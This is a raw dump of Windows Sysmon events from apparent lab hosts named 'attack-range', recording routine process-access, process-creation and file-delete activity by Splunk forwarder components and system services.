10:47:49.357{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-10D5-6216-4604-000000003902}1296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.357{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-10D5-6216-4604-000000003902}1296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:49.358{4F8D34B0-10D5-6216-4604-000000003902}1296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.795{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B2DC6CC4C945F3FF0C1AFE950E8F053,SHA256=051A5BB5D44522859B8D37C4AC8C0796381977365BFF3F5B87AA5A78B41D4FA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:50.813{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC8E00B161F7124E346B6E8EA92BFEB3,SHA256=34F5C30021ACFE129194FBCE9F2B4737F19C5DE5B49BB1D12C2A4A369DB81E77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.592{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E28358D7DB0F17EC5EC8C40CBD4C3CAF,SHA256=8F4256315E10F70BD0859F8DD4AFC6A682B5B6EC5F58506F51D3120FC40AA0C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.201{4F8D34B0-10D6-6216-4704-000000003902}1820952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-10D6-6216-4704-000000003902}1820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-10D6-6216-4704-000000003902}1820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.029{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-10D6-6216-4704-000000003902}1820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:50.030{4F8D34B0-10D6-6216-4704-000000003902}1820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:51.865{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E39437036971325514F0887891F4208E,SHA256=229841A82E2083B2F968E95D1B78C26D4ABD5A9D3D4DC009879885AE1F660367,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.811{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A9A662E437B010978C2E34DC37151DB,SHA256=A94B9CED4478A5101C4DEE6AA59E3FC7396B0025350BDC37B4D1263F17881F1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-10D7-6216-4804-000000003902}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 